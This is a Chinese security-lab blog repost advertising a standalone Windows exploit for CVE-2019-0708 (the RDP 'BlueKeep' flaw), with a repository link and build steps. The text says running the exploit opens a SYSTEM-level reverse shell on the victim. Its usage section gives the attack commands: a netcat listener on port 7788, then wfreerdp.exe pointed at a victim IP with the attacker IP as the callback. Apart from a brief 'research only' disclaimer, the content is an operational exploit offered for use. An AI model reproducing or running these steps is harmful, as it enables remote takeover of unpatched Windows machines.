国庆福利||CVE-2019-0708-EXP-Windows-Version

释放双眼,带上耳机,听听看~!


点击上方“凌天实验室”,“星标或置顶公众号”

漏洞、技术还是其他,我都想第一时间和你分享

链接:https://gitee.com/cbwang505/CVE-2019-0708-EXP-WIndows
作者:cbwang505


申  明


作者poc仅供研究目的,如果读者利用本poc从事其他行为,与本人无关


CVE-2019-0708-EXP-WIndows版独立exe运行,无需linux,python,ruby等,运行后直接反弹System权限Shell


复现环境


☛ 被攻击者操作系统Victim:Windows 7 sp1 x64位操作系统
☛ 攻击者操作系统Attacker:Windows 10 x64位操作系统
☛ 编译环境Visual Studio 2013


使用说明


☛ 进入CVE-2019-0708-EXP-Release目录
☛ 运行nc.exe -lvp 7788
☛ 运行wfreerdp.exe /v:Victim_IP /l:Attacker_IP,如wfreerdp.exe /v:10.120.1.160 /l:10.120.1.17


安装教程


☛ 复制FreeRDP-master项目至E:gitKernelResearchFreeRDP-master

☛ 解压openssl.7z至C:openssl

☛ 以管理员身份安装nasm-2.14.02-installer-x64.exe

☛ 添加C:Program FilesNASM至path环境变量

☛ 以管理员身份安装cmake-3.15.3-win64-x64.msi

☛ 添加C:Program FilesCMakebin至path环境变量

☛ 重启计算机

解压nasmBuildCustomizations.rar其中3个文件至C:Program Files (x86)MSBuildMicrosoft.Cppv4.0V120BuildCustomizations

☛ 工程目录右击->”工程依赖项”->”生成自定义”,然后勾选nasm这一项

☛ 运行”C:Program FilesCMakebincmake.exe” E:gitKernelResearchFreeRDP-masterCMakeCache.txt

☛ 编译项目,如果发现仍然缺少文件,可以从FreeRDP-master-restore.7z还原


运行效果




凌天
实验室

凌天实验室,是安百科技旗下针对应用安全领域进行攻防研究的专业技术团队,其核心成员来自原乌云创始团队及社区知名白帽子,团队专业性强、技术层次高且富有实战经验。实验室成立于2016年,发展至今团队成员已达35人,在应用安全领域深耕不辍,向网络安全行业顶尖水平攻防技术团队的方向夯实迈进。

本篇文章来源于微信公众号凌天实验室: 凌天实验室

人已赞赏
安全教程

Real World CTF 2019 两道XSS-Web题解

2019-10-13 9:01:49

安全教程

端口复用后门

2019-10-13 9:02:59

0 条回复 A文章作者 M管理员
    暂无讨论,说说你的看法吧
个人中心
购物车
优惠劵
今日签到
有新私信 私信列表
搜索